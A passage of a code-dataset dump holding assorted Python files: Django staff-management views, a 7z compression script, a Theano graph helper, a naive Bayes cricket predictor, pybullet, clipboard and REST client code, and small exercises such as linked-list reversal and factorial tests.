]\n\n return JsonResponse(org_units, safe=False)\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass LicenseAPIResource(View):\n \"\"\"An API view that returns a list of Microsoft-licensed accounts.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n # Return active users having an E5 or E1 licence assigned.\n queryset = DepartmentUser.objects.filter(\n active=True,\n ).filter(\n Q(assigned_licences__contains=['MICROSOFT 365 E5']) |\n Q(assigned_licences__contains=['OFFICE 365 E5']) |\n Q(assigned_licences__contains=['OFFICE 365 E1'])\n ).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on email.\n queryset = queryset.filter(email__icontains=self.request.GET['q'])\n\n licenses = [\n {\n 'name': user.name,\n 'email': user.email,\n 'cost_centre': user.cost_centre.code if user.cost_centre else None,\n 'microsoft_365_licence': user.get_office_licence(),\n 'active': user.active,\n 'shared': user.shared_account,\n } for user in queryset\n ]\n\n return JsonResponse(licenses, safe=False)\n\n\nclass DepartmentUserExport(View):\n \"\"\"A custom view to export details of active Department users to an Excel spreadsheet.\n \"\"\"\n def get(self, request, *args, **kwargs):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=department_users_{}_{}.xlsx'.format(date.today().isoformat(), datetime.now().strftime('%H%M'))\n\n if 'all' in request.GET: # Return all objects.\n users = DepartmentUser.objects.all()\n else: # Default to active users only.\n users = DepartmentUser.objects.filter(**DepartmentUser.ACTIVE_FILTER).exclude(account_type__in=DepartmentUser.ACCOUNT_TYPE_EXCLUDE)\n\n response = department_user_export(response, users)\n return response\n\n\nclass UserAccountExport(View):\n \"\"\"A custom view to return a subset of \"active\" DepartmentUser data to an Excel spreadsheet.\n \"\"\"\n def get(self, request, *args, **kwargs):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=user_accounts_{}_{}.xlsx'.format(date.today().isoformat(), datetime.now().strftime('%H%M'))\n\n # TODO: filtering via request params.\n users = DepartmentUser.objects.filter(active=True).order_by('username')\n response = user_account_export(response, users)\n return response\n\n\nclass AscenderDiscrepanciesExport(LoginRequiredMixin, View):\n\n def get(self, request, *args, **kwargs):\n if not request.user.is_superuser:\n return HttpResponseForbidden('Unauthorised')\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=ascender_discrepancies_{}_{}.xlsx'.format(date.today().isoformat(), datetime.now().strftime('%H%M'))\n users = DepartmentUser.objects.filter(**DepartmentUser.ACTIVE_FILTER).exclude(shared_account=True).order_by('username')\n response = department_user_ascender_discrepancies(response, users)\n return response\n\n\nclass ADActionList(LoginRequiredMixin, ListView):\n model = ADAction\n\n def get_queryset(self):\n qs = super().get_queryset()\n return qs.filter(completed__isnull=True).order_by('created')\n\n def dispatch(self, request, *args, **kwargs):\n if not (request.user.is_superuser or (request.user.is_staff and Group.objects.get(name='OIM Staff') in request.user.groups.all())):\n return HttpResponseForbidden('Unauthorised')\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['site_title'] = 'DBCA Office of Information Management'\n context['site_acronym'] = 'OIM'\n context['page_title'] = 'Active Directory actions'\n # Breadcrumb links:\n links = [(None, 'AD actions')]\n context[\"breadcrumb_trail\"] = breadcrumbs_list(links)\n return context\n\n\nclass ADActionDetail(LoginRequiredMixin, DetailView):\n model = ADAction\n\n def dispatch(self, request, *args, **kwargs):\n if not (request.user.is_superuser or (request.user.is_staff and Group.objects.get(name='OIM Staff') in request.user.groups.all())):\n return HttpResponseForbidden('Unauthorised')\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n obj = self.get_object()\n context['site_title'] = 'DBCA Office of Information Management'\n context['site_acronym'] = 'OIM'\n context['page_title'] = 'Active Directory action {}'.format(obj.pk)\n # Breadcrumb links:\n links = [(reverse(\"ad_action_list\"), \"AD actions\"), (None, obj.pk)]\n context[\"breadcrumb_trail\"] = breadcrumbs_list(links)\n return context\n\n\nclass ADActionComplete(LoginRequiredMixin, UpdateView):\n model = ADAction\n\n def dispatch(self, request, *args, **kwargs):\n if not (request.user.is_superuser or (request.user.is_staff and Group.objects.get(name='OIM Staff') in request.user.groups.all())):\n return HttpResponseForbidden('Unauthorised')\n return super().dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n # We should already have checked permissions in dispatch, so 'complete' the ADAction.\n action = self.get_object()\n action.completed = timezone.localtime()\n action.completed_by = request.user\n action.save()\n messages.success(request, \"Action {} has been marked as marked as completed\".format(action.pk))\n return HttpResponseRedirect(reverse(\"ad_action_list\"))\n\n\nclass ConfirmPhoneNos(LoginRequiredMixin, FormView):\n model = DepartmentUser\n form_class = ConfirmPhoneNosForm\n template_name = 'organisation/confirm_phone_nos.html'\n\n def get_department_user(self):\n if DepartmentUser.objects.filter(email__iexact=self.request.user.email).exists():\n return DepartmentUser.objects.get(email__iexact=self.request.user.email)\n return None\n\n def get_success_url(self):\n return reverse('confirm_phone_nos')\n\n def dispatch(self, request, *args, **kwargs):\n user = self.get_department_user()\n # Business rule: you can only open this view if there's a matching DepartmentUser object to your logged-in User.\n if not user:\n return HttpResponseForbidden('Unauthorised')\n return super().dispatch(request, *args, **kwargs)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n options = {'work_telephone': [], 'work_mobile_phone': []}\n user = self.get_department_user()\n if user.telephone:\n options['work_telephone'].append((user.telephone, user.telephone))\n if user.ascender_data and 'work_phone_no' in user.ascender_data and user.ascender_data['work_phone_no'] and user.ascender_data['work_phone_no'] != user.telephone:\n options['work_telephone'].append((user.ascender_data['work_phone_no'], user.ascender_data['work_phone_no']))\n options['work_telephone'].append(('NA', 'Not applicable (no work telephone in use)'))\n if user.mobile_phone:\n options['work_mobile_phone'].append((user.mobile_phone, user.mobile_phone))\n if user.ascender_data and 'work_mobile_phone_no' in user.ascender_data and user.ascender_data['work_mobile_phone_no'] and user.ascender_data['work_mobile_phone_no'] != user.mobile_phone:\n options['work_mobile_phone'].append((user.ascender_data['work_mobile_phone_no'], user.ascender_data['work_mobile_phone_no']))\n options['work_mobile_phone'].append(('NA', 'Not applicable (no work mobile phone in use)'))\n kwargs['options'] = options\n return kwargs\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['site_title'] = 'DBCA Office of Information Management'\n context['site_acronym'] = 'OIM'\n context['page_title'] = '{} - DBCA telephone numbers'.format(self.request.user.get_full_name())\n user = self.get_department_user()\n if user.ascender_data and 'audit_confirm_phone_nos' in user.ascender_data:\n context['completed_form'] = True\n else:\n context['completed_form'] = False\n return context\n\n def form_valid(self, form):\n user = self.get_department_user()\n user.ascender_data['audit_confirm_phone_nos'] = form.cleaned_data\n user.ascender_data['audit_confirm_phone_nos']['user_submitted'] = datetime.utcnow().isoformat()\n user.save()\n messages.success(self.request, 'Your response have been saved.')\n return super().form_valid(form)\n","sub_path":"organisation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"65976827","text":"# -*- coding: utf-8 -*-\nimport subprocess, traceback, os\nversion = '1.0'\nfile_pw = '' # 密码\npw_file = '密码写在这里面.txt'\ninput_path = '需要压缩的文件放这里'\noutput_path = '压缩完成的文件在这里'\n\n\ndef get_pw():\n global file_pw\n with open(pw_file, 'r', encoding='utf-8') as f:\n file_pw = f.read().strip()\n \n\ndef get_files():\n dirs = os.listdir(input_path)\n if not os.path.exists(output_path):\n os.mkdir(output_path)\n for i in range(len(dirs)):\n command = 'HaoZipC a -t7z \"../{2}/{0}(内层).7z\" \"../{1}/{0}\" -mhe=on -mmt=on'\\\n .format(dirs[i], input_path, output_path)\n command2 = 'HaoZipC a -t7z -p\"{0}\" \"../{2}/{1}.7z\" \"../{2}/{1}(内层).7z\" -mhe=on -mmt=on' \\\n .format(file_pw, dirs[i], output_path)\n # 同路径下需要有压缩程序 HaoZipC\n subprocess.run(command, shell=True, cwd=\"./HaoZip\")\n subprocess.run(command2, shell=True, cwd=\"./HaoZip\")\n os.remove('./{1}/{0}(内层).7z'.format(dirs[i], output_path))\n\n\ndef main():\n print('version: '+version)\n get_pw()\n get_files()\n input('按任意键退出')\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n traceback.print_exc()\n input('按任意键退出')\n","sub_path":"auto_7z.py","file_name":"auto_7z.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"72033433","text":"\"\"\"Annotated computation graph management.\"\"\"\nimport logging\n\nimport theano\nfrom theano import Variable\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nfrom blocks.utils import is_graph_input\n\nlogger = logging.getLogger(__name__)\n\n\nclass ComputationGraph(object):\n \"\"\"Encapsulates a managed Theano computation graph.\n\n Parameters\n ----------\n outputs : list of Theano variables\n The outputs of the computation graph.\n\n Attributes\n ----------\n inputs : list of Theano variables\n The inputs of the computation graph.\n outputs : list of Theano variables\n The outputs of the computations graph.\n\n \"\"\"\n def __init__(self, outputs):\n if isinstance(outputs, Variable):\n outputs = [outputs]\n self.outputs = outputs\n self._get_variables()\n\n def _get_variables(self):\n self.variables = set()\n self.applies = set()\n self.application_calls = set()\n self.updates = []\n\n def recursion(current):\n self.variables.add(current)\n\n if hasattr(current.tag, 'application_call'):\n logger.debug(\"found application call of {}\".format(current))\n application_call = current.tag.application_call\n if application_call not in self.application_calls:\n self.application_calls.add(application_call)\n for av in application_call.auxiliary_variables:\n av.tag.application_call = current.tag.application_call\n recursion(av)\n self.updates.extend(application_call.updates)\n if current.owner:\n owner = current.owner\n if owner not in self.applies:\n if hasattr(owner.tag, 'updates'):\n logger.debug(\"found updates in application of {}\"\n .format(owner))\n self.updates.extend(owner.tag.updates.items())\n self.applies.add(owner)\n for input_ in owner.inputs:\n if input_ not in self.variables:\n recursion(input_)\n\n for output in self.outputs:\n if output not in self.variables:\n recursion(output)\n self.inputs = [v for v in self.variables if is_graph_input(v)]\n\n def dict_of_inputs(self):\n \"\"\"Return a mapping from an input name to the input.\"\"\"\n return {var.name: var for var in self.inputs}\n\n def replace(self, replacements):\n \"\"\"Replace certain variables in the computation graph.\n\n Parameters\n ----------\n replacements : dict\n The mapping from variables to be replaced to the corresponding\n substitutes.\n\n \"\"\"\n return ComputationGraph(theano.clone(self.outputs,\n replace=replacements))\n\n def get_theano_function(self):\n \"\"\"Create Theano function from the graph contained.\"\"\"\n return theano.function(self.inputs, self.outputs,\n updates=self.updates)\n\n\ndef apply_noise(graph, variables, level, rng=None):\n \"\"\"Add Gaussian noise to certain variable of a computation graph.\n\n Parameters\n ----------\n graph : instance of :class:`ComputationGraph`\n The computation graph.\n varibles : Theano variables\n Variables to add noise to.\n level : float\n Noise level.\n rng : Theano random stream, optional\n The random stream to use. By default an RNG with seed equal to 1 is\n used.\n\n \"\"\"\n if not rng:\n rng = RandomStreams(1)\n replace = {}\n for variable in variables:\n replace[variable] = (variable +\n rng.normal(variable.shape, std=level))\n return graph.replace(replace)\n","sub_path":"blocks/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"220220252","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\nfrom schema import EnumList\n\nTextFormatID = EnumList('TextFormatID','tz::u8',[\n ('DEBUG_TEXT', 'デバッグ'),\n ('DEBUG_HIGHLIGHT', 'デバッグハイライト'),\n])\n\nTextID = EnumList('TextID', 'tz::u32',\n ['TEXT_{0:02d}'.format(i) for i in xrange(1,3)] +\n ['TEXT2_{0:02d}'.format(i) for i in xrange(1,4)]\n)\n","sub_path":"sample/assets/data/text_def.py","file_name":"text_def.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"350271603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 23:52:27 2019\n\n@author: me\n\"\"\"\n\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n# Required Data\ndata = pd.read_csv(\"Data_Training.csv\")\ndata.dropna(inplace=True)\ndata_2019 = pd.read_csv(\"Data_Testing_2019.csv\")\ndata_2019.drop(columns=[\"Unnamed: 0\"], inplace=True)\n\nx = data.drop(columns=[\"Output\"])\nx = data.drop(columns=[\"Output\", \"Unnamed: 0\", \"match_url\"])\ny = data.Output\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=64)\nx_2019 = data_2019.drop(columns= [\"Match\", \"Team1\", \"Team2\"])\n\n\nfrom sklearn.naive_bayes import GaussianNB\n\n#Create a Gaussian Classifier\nclf = GaussianNB()\n\n# Train the model using the training sets\nclf.fit(x_train,y_train)\n\n#Predict Output\ny_pred= clf.predict(x_test) \n\n\nfrom sklearn import metrics\n# Model Accuracy, how often is the classifier correct?\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n\n\nprediction_2019 = clf.predict(x_2019)\ndata_2019[\"Result\"] = prediction_2019\n\ndef winner(x):\n if x.Result == 1:\n x[\"Winning_Team\"] = x.Team1\n else:\n x[\"Winning_Team\"] = x.Team2\n return x\n\ndef winner_two_teams(team1,team2,x):\n x=x[(x[\"Team1\"]==team1) & (x[\"Team2\"]==team2) | (x[\"Team1\"]==team2) & (x[\"Team2\"]==team1)]\n \n x=x.apply(winner,axis=1)\n return x\n\n\n\ndata_2019_final = data_2019.apply(winner, axis= 1)\nresults_2019 = data_2019_final.groupby(\"Winning_Team\").size()\nresults_2019 = results_2019.sort_values(ascending=False)\nprint(results_2019)\nprint(data_2019)\nprint(winner_two_teams(\"India\",\"Pakistan\",data_2019))","sub_path":"naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379305783","text":"\"\"\"\n@Project :20180810\n@Time :2018/8/10 10:57\n@Author :Zhenxian\n@File :client_demo.py\n@Software :PyCharm\n\"\"\"\nimport socket\n\nsk = socket.socket() # 创建客户套接字\nsk.connect(('127.0.0.1', 8898)) # 尝试连接服务器\nsk.send(b'hello!')\nret = sk.recv(1024) # 对话(发送/接收)\nprint(ret)\nsk.close() # 关闭客户套接字\n","sub_path":"20180810/client_demo.py","file_name":"client_demo.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"55478403","text":"'''\n206. Reverse Linked List My Submissions Question\n\nReverse a singly linked list.\n\nclick to show more hints.\n'''\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reverseList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n 56 msP\n \"\"\"\n dummy = ListNode(0)\n \n curr = head\n while curr is not None: \n # 1-> 2 ->3 -> 4 -> 5\n # dummy->1\n # dummy -> 2\n temp = dummy.next\n dummy.next = curr \n curr = curr.next\n dummy.next.next = temp\n\n return dummy.next","sub_path":"206_reverse_linkedlist.py","file_name":"206_reverse_linkedlist.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"19367242","text":"#!/usr/bin/env python3\n\n# -------------\n# FactorialT.py\n# -------------\n\nfrom math import factorial\nfrom timeit import timeit\nfrom unittest import main, TestCase\n\nfrom Factorial import \\\n factorial_range_for, \\\n factorial_range_reduce, \\\n factorial_recursion, \\\n factorial_tail_recursion, \\\n factorial_while\n\nclass MyUnitTests (TestCase) :\n def setUp (self) :\n self.a = [\n factorial_recursion,\n factorial_tail_recursion,\n factorial_while,\n factorial_range_for,\n factorial_range_reduce,\n factorial]\n\n def test_0 (self) :\n for f in self.a :\n with self.subTest() :\n self.assertEqual(f(0), 1)\n\n def test_1 (self) :\n for f in self.a :\n with self.subTest() :\n self.assertEqual(f(1), 1)\n\n def test_2 (self) :\n for f in self.a :\n with self.subTest() :\n self.assertEqual(f(2), 2)\n\n def test_3 (self) :\n for f in self.a :\n with self.subTest() :\n self.assertEqual(f(3), 6)\n\n def test_4 (self) :\n for f in self.a :\n with self.subTest() :\n self.assertEqual(f(4), 24)\n\n def test_5 (self) :\n for f in self.a :\n with self.subTest() :\n self.assertEqual(f(5), 120)\n\n def test_6 (self) :\n for f in self.a :\n with self.subTest() :\n print()\n print(f.__name__)\n t = timeit(f.__name__ + \"(100)\", \"from __main__ import \" + f.__name__, number = 1000)\n print(\"{:.2f} milliseconds\".format(t * 1000))\n print()\n\nif __name__ == \"__main__\" :\n main()\n\n\"\"\"\n% FactorialT.py\n......\nfactorial_recursion\n20.83 milliseconds\n\n\nfactorial_tail_recursion\n26.73 milliseconds\n\n\nfactorial_while\n14.54 milliseconds\n\n\nfactorial_range_for\n9.07 milliseconds\n\n\nfactorial_range_reduce\n8.36 milliseconds\n\n\nfactorial\n0.94 milliseconds\n\n.\n----------------------------------------------------------------------\nRan 7 tests in 0.089s\n\nOK\n\"\"\"\n","sub_path":"exercises/FactorialT.py","file_name":"FactorialT.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"573019803","text":"#-*-coding:utf-8-*-\nimport pybullet as p\nimport time\nimport pybullet_data\n\n# GUI 에 연결\nphysicsClient = p.connect(p.GUI)\n\n# 중력 가속도\np.setGravity(0, 0, -9.8)\n\n# pybullet 내장 model 들을 로드\np.setAdditionalSearchPath(pybullet_data.getDataPath())\n\np.setTimeStep(1/200)\n\n\n\ncubeStartPos = [0, 0, 1]\ncubeStartOrientation = p.getQuaternionFromEuler([0, 0, 0])\nwheel_indices = [0,1,2,3]\nhinge_indicies = [0,2]\n\n\nplaneID = p.loadURDF(\"plane.urdf\")\ncarID = p.loadURDF(\"./simplecar.urdf\", cubeStartPos, cubeStartOrientation)\nnumber_of_joints=p.getNumJoints(carID)\n\n\nangle =p.addUserDebugParameter(\"Steering\",-0.5,0.5,0) # 디버그 창의 좌표\nthrottle = p.addUserDebugParameter(\"Throttle\",0,20,0)\nfor i in range(10000):\n # ----- code here\n\n user_angle = p.readUserDebugParameter(angle)\n user_throttle = p.readUserDebugParameter(throttle)\n\n for joint_index in wheel_indices:\n p.setJointMotorControl2(carID, joint_index,\n p.VELOCITY_CONTROL,\n targetVelocity=user_throttle)\n # ----- code end\n p.stepSimulation() # 명령 적용 후 rendering 1번.\n time.sleep(1 / 200)\n\np.disconnect(physicsClient)","sub_path":"PybulletTutorialPart1/PybulletTutorialPart1.py","file_name":"PybulletTutorialPart1.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"599322011","text":"# Copyright (C) 2019 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"RBAC Factories for ggrc models.\"\"\"\n\nfrom integration.ggrc.access_control.rbac_factories import (audit, assessment,\n document, review,\n assessment_template, # noqa: E501\n snapshot, issue,\n program, workflow,\n task_group,\n task_group_task,\n cycle,\n cycle_task_group,\n cycle_task,\n cycle_task_entry,\n evidence,\n universal_factory)\n\n\nTEST_FACTORIES_MAPPING = {\n \"Audit\": audit.AuditRBACFactory,\n \"Assessment\": assessment.AssessmentRBACFactory,\n \"AssessmentTemplate\": assessment_template.AssessmentTemplateRBACFactory,\n \"Snapshot\": snapshot.SnapshotRBACFactory,\n \"Issue\": issue.IssueRBACFactory,\n \"Evidence\": evidence.EvidenceRBACFactory,\n \"Document\": document.DocumentReferenceUrlRBACFactory,\n \"Program\": program.ProgramRBACFactory,\n \"MappedReview\": review.MappedReviewRBACFactory,\n \"Workflow\": workflow.WorkflowRBACFactory,\n \"TaskGroup\": task_group.TaskGroupRBACFactory,\n \"TaskGroupTask\": task_group_task.TaskGroupTaskRBACFactory,\n \"Cycle\": cycle.CycleRBACFactory,\n \"CycleTaskGroup\": cycle_task_group.CycleTaskGroupRBACFactory,\n \"CycleTask\": cycle_task.CycleTaskRBACFactory,\n \"CycleTaskEntry\": cycle_task_entry.CycleTaskEntryRBACFactory,\n \"Universal\": universal_factory.UniversalRBACFactory\n}\n","sub_path":"test/integration/ggrc/access_control/rbac_factories/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340208759","text":"# Pyperclip v1.3\n# A cross-platform clipboard module for Python. (only handles plain text for now)\n# By Al Sweigart al@coffeeghost.net\n\n# Usage:\n# import pyperclip\n# pyperclip.copy('The text to be copied to the clipboard.')\n# spam = pyperclip.paste()\n\n# On Mac, this module makes use of the pbcopy and pbpaste commands, which should come with the os.\n# On Linux, this module makes use of the xclip command, which should come with the os. Otherwise run \"sudo apt-get install xclip\"\n\n\n# Copyright (c) 2010, Albert Sweigart\n# All rights reserved.\n#\n# BSD-style license:\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the pyperclip nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY Albert Sweigart \"AS IS\" AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL Albert Sweigart BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n# Change Log:\n# 1.2 Use the platform module to help determine OS.\n# 1.3 Changed ctypes.windll.user32.OpenClipboard(None) to ctypes.windll.user32.OpenClipboard(0), after some people ran into some TypeError\n\nimport platform, os, time\n\nclass PyClipboard(object):\n \"\"\"docstring for Clipboard\"\"\"\n def __init__(self):\n self.detect_os()\n self.read = self.os_clipboard.read\n self.write = self.os_clipboard.write\n\n def watch(self):\n pass\n\n def detect_os(self):\n if os.name == 'nt' or platform.system() == 'Windows':\n self.set_os_windows()\n elif os.name == 'mac' or platform.system() == 'Darwin':\n self.set_os_mac()\n elif os.name == 'posix' or platform.system() == 'Linux':\n self.set_os_linux()\n\n def set_os_windows(self):\n import ctypes\n from WindowsClipboard import WindowsClipboard\n self.os_clipboard = WindowsClipboard()\n\n def set_os_mac(self):\n from MacClipboard import MacClipboard\n self.os_clipboard = MacClipboard()\n\n def set_os_linux(self):\n xclipExists = os.system('which xclip') == 0\n if xclipExists:\n self.read = xclipGetClipboard\n self.write = xclipSetClipboard\n else:\n xselExists = os.system('which xsel') == 0\n if xselExists:\n self.read = xselGetClipboard\n self.write = xselSetClipboard\n try:\n import gtk\n self.read = gtkGetClipboard\n self.write = gtkSetClipboard\n except:\n try:\n import PyQt4.QtCore\n import PyQt4.QtGui\n app = QApplication([])\n cb = PyQt4.QtGui.QApplication.clipboard()\n self.read = qtGetClipboard\n self.write = qtSetClipboard\n except:\n raise Exception('Pyperclip requires the gtk or PyQt4 module installed, or the xclip command.')","sub_path":"PyClipboard.py","file_name":"PyClipboard.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"45705138","text":"#!/usr/bin/env python\n\"\"\"\napi/rest_organization.py\n\nCopyright 2021 Triple Dot Engineering LLC\n\nDefines the RestOrg class used to interact with organizations via the API.\n\"\"\"\nimport json\nfrom .. import util\nfrom ._abc_rest_obj import RestObject\nfrom .api import TriviumApi\n\n\nclass RestOrg(RestObject):\n \"\"\"Class for interacting with Orgs via REST api\"\"\"\n\n ##\n # RestOrg constructor\n ##\n def __init__(self, data):\n super().__init__()\n self._data = data\n\n ##\n # Returns the string representation of an organization\n ##\n def __repr__(self):\n return self.__str__()\n\n ##\n # Returns the string representation of an organization\n ##\n def __str__(self):\n return json.dumps(self._data, indent=4)\n\n\n ##\n # Takes a list of organizations as input and prints them in tabular format.\n ##\n @staticmethod\n def print_table(orgs):\n \"\"\"Prints in tabular format.\"\"\"\n fmt = '{id:20s} {name:32s}'\n labels = {\n 'id': 'ID',\n 'name': 'Name'\n }\n header_fmt = util.Colors.CYAN + util.Colors.BOLD\n print(header_fmt + fmt.format(**labels) + util.Colors.ENDC)\n\n for org in orgs:\n print(fmt.format(**org))\n\n\n ##\n # Gets a single org is the org id is provided, otherwise gets all orgs\n # that the user has access to.\n ##\n @staticmethod\n def get(org=None):\n \"\"\"Gets one or more orgs\"\"\"\n url = '/orgs' if org is None else '/orgs/{}'.format(org)\n r = TriviumApi().make_request(url)\n if r.status_code == 200:\n return r.json()\n\n # If not 200, raise exception\n raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n\n\n ##\n # Posts an organization based on the input data.\n ##\n @staticmethod\n def post(data):\n \"\"\"Posts an org\"\"\"\n opts = {\n 'method': 'POST',\n 'params': {},\n 'body': data\n }\n r = TriviumApi().make_request('/orgs', **opts)\n if r.status_code == 200:\n return r.json()\n raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n\n\n ##\n # Deletes an organization.\n ##\n @staticmethod\n def delete(identifier):\n \"\"\"Deletes orgs\"\"\"\n opts = {\n 'method': 'DELETE',\n 'params': {}\n }\n url = '/orgs/{0}'.format(identifier)\n r = TriviumApi().make_request(url, **opts)\n if r.status_code == 200:\n return r.json()\n\n # if not 200\n raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n\n ##\n # Patches organization(s)\n ##\n @staticmethod\n def patch(data):\n \"\"\"Patches orgs\"\"\"\n opts = {\n 'method': 'PATCH',\n 'params': {},\n 'body': data\n }\n r = TriviumApi().make_request('/orgs', **opts)\n if r.status_code == 200:\n return r.json()\n # if not 200\n raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n","sub_path":"trivium/api/rest_organization.py","file_name":"rest_organization.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"482789952","text":"#Daniel Edwards 4/9/2014\n\nfrom collections import deque\n\nclass BadMoveException (Exception):\n \n def __init__(self, expr, msg):\n self.expr = expr\n self.msg = msg\n \n def __str__(self):\n error = \"Your error occurred with input \" + self.expr + \"\\n\" + self.message\n return error\n\n\nclass PuzzleState (object):\n '''\nAbstracts a sliding puzzle with one gap. Internally stored as a flattened\nlist called 'gamestate', with the gap represented as None.\n\nFor details, see: https://github.com/rfdickerson/CS241/tree/master/A5\n'''\n\n def __init__(self, dimensions, gamestate, parent, lastMove):\n self.dimensions = dimensions\n self.gamestate = gamestate\n self.parent = parent\n self.lastMove = lastMove\n \n i = 0\n while i < len(self.gamestate):\n if gamestate[i] == None:\n self.nullIndex = i\n i += 1\n \n\n def coordToIndex(self, coord):\n '''Given an (x, y) tuple, return the index in the gamestate list\ncorresponding to the tile at (x, y). Coordinates are zero-indexed.'''\n x = coord[0]\n y = coord[1]\n \n row_index = y * self.dimensions[1]\n index = row_index + x\n \n return index\n\n def indexToCoord(self, index):\n '''Given a tile index into gamestate list, return the (x, y) tuple\ncorresponding to that tile. Coordinates are zero-indexed.'''\n y = index // self.dimensions[1]\n x = index % self.dimensions[1]\n \n return (x, y)\n\n def moveDown(self):\n '''Returns a new instance of PuzzleState where the gap and the value\nabove it are flipped.'''\n gameChange = self.gamestate[:]\n tileBelowX = self.nullIndex + self.dimensions[1]\n if tileBelowX < len(self.gamestate):\n if tileBelowX != None:\n gameChange[self.nullIndex] = self.gamestate[tileBelowX]\n gameChange[tileBelowX] = None\n newState = PuzzleState(self.dimensions, gameChange, self, 'Down')\n return newState\n\n raise BadMoveException('Up', 'Illegal Move Operation')\n\n def moveUp(self):\n '''Returns a new instance of PuzzleState where the gap and the value\nbelow it are flipped.'''\n gameChange = self.gamestate[:]\n tileAboveX = self.nullIndex - self.dimensions[1]\n if tileAboveX < len(self.gamestate):\n if tileAboveX != None:\n gameChange[self.nullIndex] = self.gamestate[tileAboveX]\n gameChange[tileAboveX] = None\n newState = PuzzleState(self.dimensions, gameChange, self, 'Up')\n return newState\n \n raise BadMoveException('Down', 'Illegal Move Operation')\n \n\n def moveRight(self):\n '''Returns a new instance of PuzzleState where the gap and the value\nto its left are flipped.'''\n gameChange = self.gamestate[:]\n tileRightX = self.nullIndex + 1\n if (tileRightX % self.dimensions[1]) > (self.nullIndex 